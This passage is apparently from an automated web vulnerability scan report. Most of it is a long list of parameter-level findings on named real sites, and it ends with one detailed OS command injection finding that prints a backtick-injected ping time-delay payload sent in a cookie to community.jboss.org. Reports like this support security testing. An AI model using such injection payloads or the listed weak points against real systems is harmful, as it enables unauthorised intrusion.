4.311. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsS parameter]

4.312. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsT parameter]

4.313. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsT parameter]

4.314. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsU parameter]

4.315. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsU parameter]

4.316. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsV parameter]

4.317. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsV parameter]

4.318. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsW parameter]

4.319. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsW parameter]

4.320. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsX parameter]

4.321. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsX parameter]

4.322. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsY parameter]

4.323. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsY parameter]

4.324. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsZ parameter]

4.325. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsZ parameter]

4.326. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strLsId parameter]

4.327. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strLsId parameter]

4.328. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]

4.329. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]

4.330. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegion parameter]

4.331. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegions parameter]

4.332. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strRegions parameter]

4.333. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strSQL3 parameter]

4.334. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strSQL3 parameter]

4.335. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strStates parameter]

4.336. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [strStates parameter]

4.337. http://listings.nytimes.com/BusinessDirectory/View_Listing.asp [CategoryID parameter]

4.338. http://listings.nytimes.com/BusinessDirectory/View_Listing.asp [Lid parameter]

4.339. https://placead.nytimes.com/default.asp [CategoryID parameter]

4.340. https://pro.vembu.com/account.php [error parameter]

4.341. https://pro.vembu.com/account.php [header parameter]

4.342. https://pro.vembu.com/account.php [name of an arbitrarily supplied request parameter]

4.343. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 3]

4.344. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 4]

4.345. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 5]

4.346. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 6]

4.347. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 7]

4.348. http://seamframework.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 8]

4.349. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 3]

4.350. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 4]

4.351. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 5]

4.352. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 6]

4.353. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 7]

4.354. http://sfwk.org/a4j/g/3_3_3.CR1org/richfaces/renderkit/html/scripts/skinning.js [REST URL parameter 8]

4.355. http://storegrid.vembu.com/404.php [name of an arbitrarily supplied request parameter]

4.356. http://storegrid.vembu.com/online-backup/active-directory-backup.php [ct parameter]

4.357. http://storegrid.vembu.com/online-backup/active-directory-backup.php [name of an arbitrarily supplied request parameter]

4.358. http://storegrid.vembu.com/online-backup/backup-alerts.php [ct parameter]

4.359. http://storegrid.vembu.com/online-backup/backup-alerts.php [name of an arbitrarily supplied request parameter]

4.360. http://storegrid.vembu.com/online-backup/backup-solutions.php [name of an arbitrarily supplied request parameter]

4.361. http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php [ct parameter]

4.362. http://storegrid.vembu.com/online-backup/bare-metal-image-backup.php [name of an arbitrarily supplied request parameter]

4.363. http://storegrid.vembu.com/online-backup/computer-backup.php [name of an arbitrarily supplied request parameter]

4.364. http://storegrid.vembu.com/online-backup/customer-management.php [ct parameter]

4.365. http://storegrid.vembu.com/online-backup/customer-management.php [name of an arbitrarily supplied request parameter]

4.366. http://storegrid.vembu.com/online-backup/external-disk-backup.php [ct parameter]

4.367. http://storegrid.vembu.com/online-backup/external-disk-backup.php [name of an arbitrarily supplied request parameter]

4.368. http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php [ct parameter]

4.369. http://storegrid.vembu.com/online-backup/flexible-web-console-administration.php [name of an arbitrarily supplied request parameter]

4.370. http://storegrid.vembu.com/online-backup/ms-exchange-backup.php [ct parameter]

4.371. http://storegrid.vembu.com/online-backup/ms-exchange-backup.php [name of an arbitrarily supplied request parameter]

4.372. http://storegrid.vembu.com/online-backup/mssql-backup.php [ct parameter]

4.373. http://storegrid.vembu.com/online-backup/mssql-backup.php [name of an arbitrarily supplied request parameter]

4.374. http://storegrid.vembu.com/online-backup/mysql-backup.php [ct parameter]

4.375. http://storegrid.vembu.com/online-backup/mysql-backup.php [name of an arbitrarily supplied request parameter]

4.376. http://storegrid.vembu.com/online-backup/network-backup.php [name of an arbitrarily supplied request parameter]

4.377. http://storegrid.vembu.com/online-backup/outlook-backup.php [ct parameter]

4.378. http://storegrid.vembu.com/online-backup/outlook-backup.php [name of an arbitrarily supplied request parameter]

4.379. http://storegrid.vembu.com/online-backup/partner-zone.php [name of an arbitrarily supplied request parameter]

4.380. http://storegrid.vembu.com/online-backup/refer-partner.php [name of an arbitrarily supplied request parameter]

4.381. http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php [ct parameter]

4.382. http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php [name of an arbitrarily supplied request parameter]

4.383. http://storegrid.vembu.com/online-backup/security.php [ct parameter]

4.384. http://storegrid.vembu.com/online-backup/security.php [name of an arbitrarily supplied request parameter]

4.385. http://storegrid.vembu.com/online-backup/sharepoint-backup.php [ct parameter]

4.386. http://storegrid.vembu.com/online-backup/sharepoint-backup.php [name of an arbitrarily supplied request parameter]

4.387. http://storegrid.vembu.com/online-backup/storegrid-screenshots.php [ct parameter]

4.388. http://storegrid.vembu.com/online-backup/storegrid-screenshots.php [name of an arbitrarily supplied request parameter]

4.389. http://storegrid.vembu.com/online-backup/support-plans-sp.php [name of an arbitrarily supplied request parameter]

4.390. http://storegrid.vembu.com/online-backup/troubleshooting.php [name of an arbitrarily supplied request parameter]

4.391. http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php [ct parameter]

4.392. http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php [name of an arbitrarily supplied request parameter]

4.393. http://storegrid.vembu.com/search-results.php [name of an arbitrarily supplied request parameter]

4.394. http://storegrid.vembu.com/sitemap.php [name of an arbitrarily supplied request parameter]

4.395. http://storegrid.vembu.com/technology-partners.php [name of an arbitrarily supplied request parameter]

4.396. http://storegrid.vembu.com/video.php [name of an arbitrarily supplied request parameter]

4.397. http://storegrid.vembu.com/whitepapers.php [name of an arbitrarily supplied request parameter]

4.398. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html [REST URL parameter 2]

4.399. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html [name of an arbitrarily supplied request parameter]

4.400. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [REST URL parameter 2]

4.401. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [REST URL parameter 3]

4.402. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [name of an arbitrarily supplied request parameter]

4.403. http://www.gmodules.com/gadgets/ifr [url parameter]

4.404. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 2]

4.405. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 3]

4.406. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 4]

4.407. http://www.hitachi.us/connected/#/data/x22 [name of an arbitrarily supplied request parameter]

4.408. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 1]

4.409. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 2]

4.410. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 2]

4.411. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 3]

4.412. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 4]

4.413. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [name of an arbitrarily supplied request parameter]

4.414. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]

4.415. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]

4.416. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]

4.417. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]

4.418. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]

4.419. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]

4.420. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]

4.421. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]

4.422. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]

4.423. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]

4.424. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]

4.425. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]

4.426. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]

4.427. http://www.nuxeo.com/en/services/training [REST URL parameter 1]

4.428. http://www.nuxeo.com/en/services/training [REST URL parameter 2]

4.429. http://www.nuxeo.com/en/services/training [REST URL parameter 3]

4.430. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]

4.431. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]

4.432. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]

4.433. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]

4.434. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

4.435. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

4.436. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

4.437. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

4.438. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

4.439. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

4.440. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

4.441. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

4.442. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]

4.443. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

4.444. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

4.445. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

4.446. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

4.447. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

4.448. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

4.449. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

4.450. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

4.451. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

4.452. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

4.453. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

4.454. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

4.455. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

4.456. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

4.457. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

4.458. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

4.459. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

4.460. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

4.461. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

4.462. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

4.463. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

4.464. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

4.465. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

4.466. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

4.467. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

4.468. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

4.469. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

4.470. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

4.471. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

4.472. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

4.473. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

4.474. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

4.475. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

4.476. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

4.477. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

4.478. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

4.479. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

4.480. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

4.481. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

4.482. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

4.483. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

4.484. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

4.485. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

4.486. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

4.487. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

4.488. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

4.489. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

4.490. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

4.491. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

4.492. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

4.493. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

4.494. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

4.495. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

4.496. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

4.497. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

4.498. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

4.499. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

4.500. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

4.501. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

4.502. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

4.503. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

4.504. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

4.505. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

4.506. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

4.507. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

4.508. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

4.509. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

4.510. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

4.511. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

4.512. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

4.513. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

4.514. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

4.515. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

4.516. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

4.517. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

4.518. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

4.519. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

4.520. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

4.521. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

4.522. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

4.523. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

4.524. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

4.525. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

4.526. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

4.527. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

4.528. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

4.529. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

4.530. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

4.531. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

4.532. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

4.533. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

4.534. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

4.535. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

4.536. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

4.537. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

4.538. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

4.539. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

4.540. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

4.541. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

4.542. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

4.543. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

4.544. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

4.545. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

4.546. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

4.547. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

4.548. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

4.549. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

4.550. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

4.551. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

4.552. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

4.553. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

4.554. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

4.555. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

4.556. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

4.557. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

4.558. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

4.559. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

4.560. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

4.561. http://www.pcworld.com/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22 [REST URL parameter 3]

4.562. http://www.pcworld.com/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22 [REST URL parameter 4]

4.563. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 2]

4.564. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 3]

4.565. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 4]

4.566. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [name of an arbitrarily supplied request parameter]

4.567. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday parameter]

4.568. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [REST URL parameter 1]

4.569. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [REST URL parameter 2]

4.570. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [name of an arbitrarily supplied request parameter]

4.571. http://www.videobox.com/beta/2257.seam [REST URL parameter 1]

4.572. http://www.videobox.com/beta/2257.seam [REST URL parameter 2]

4.573. http://www.videobox.com/beta/clear_channel.seam [REST URL parameter 1]

4.574. http://www.videobox.com/beta/clear_channel.seam [REST URL parameter 2]

4.575. http://www.videobox.com/beta/contact_us.seam [REST URL parameter 1]

4.576. http://www.videobox.com/beta/contact_us.seam [REST URL parameter 2]

4.577. http://www.videobox.com/beta/jobs.seam [REST URL parameter 1]

4.578. http://www.videobox.com/beta/jobs.seam [REST URL parameter 2]

4.579. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 1]

4.580. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 2]

4.581. http://www.videobox.com/beta/member/browse-clips.seam [REST URL parameter 3]

4.582. http://www.videobox.com/beta/premium_channel.seam [REST URL parameter 1]

4.583. http://www.videobox.com/beta/premium_channel.seam [REST URL parameter 2]

4.584. http://www.videobox.com/beta/privacy.seam [REST URL parameter 1]

4.585. http://www.videobox.com/beta/privacy.seam [REST URL parameter 2]

4.586. http://www.videobox.com/beta/reviews.seam [REST URL parameter 1]

4.587. http://www.videobox.com/beta/reviews.seam [REST URL parameter 2]

4.588. http://www.videobox.com/beta/set_channel.seam [REST URL parameter 1]

4.589. http://www.videobox.com/beta/set_channel.seam [REST URL parameter 2]

4.590. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 1]

4.591. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 2]

4.592. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 3]

4.593. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 4]

4.594. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 5]

4.595. http://www.videobox.com/beta/style/shun/base/base/en/screen.seam [REST URL parameter 6]

4.596. http://www.videobox.com/beta/support/home.seam [REST URL parameter 1]

4.597. http://www.videobox.com/beta/support/home.seam [REST URL parameter 2]

4.598. http://www.videobox.com/beta/support/home.seam [REST URL parameter 3]

4.599. http://www.videobox.com/beta/tos.seam [REST URL parameter 1]

4.600. http://www.videobox.com/beta/tos.seam [REST URL parameter 2]

4.601. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 1]

4.602. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 2]

4.603. http://www.videobox.com/beta/tour/browse.seam [REST URL parameter 3]

4.604. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 1]

4.605. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 2]

4.606. http://www.videobox.com/beta/tour/flash.seam [REST URL parameter 3]

4.607. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 1]

4.608. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 2]

4.609. http://www.videobox.com/beta/tour/how_it_works.seam [REST URL parameter 3]

4.610. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 1]

4.611. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 2]

4.612. http://www.videobox.com/beta/tourPages/std_browse_page.seam [REST URL parameter 3]

4.613. http://devoxx.com/display/Devoxx2K10/Home [User-Agent HTTP header]

4.614. http://m1055.ic-live.com/840/ [User-Agent HTTP header]

4.615. http://storegrid.vembu.com/cgi-bin/automail [Referer HTTP header]

4.616. http://storegrid.vembu.com/cgi-bin/mail [Referer HTTP header]

4.617. http://www.videobox.com/ [Referer HTTP header]

5. Cookie without HttpOnly flag set

5.1. http://www.partsallover.com.au/home

5.2. http://www.videobox.com/

6. Cross-domain Referer leakage

6.1. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome

6.2. http://www.nuxeo.org/xwiki/bin/export/skins/toucan

7. Cross-domain script include

7.1. http://storegrid.vembu.com/404.php

7.2. http://storegrid.vembu.com/forum/

8. Email addresses disclosed

9. Private IP addresses disclosed

10. Cacheable HTTPS response

11. Content type incorrectly stated



1. OS command injection  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.jboss.org
Path:   /people/dan.j.allen/blog/2010/10/20/speaking-at-utah-jug

Issue detail

The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utmc cookie. The application took 35911 milliseconds to respond to the request, compared with 1020 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

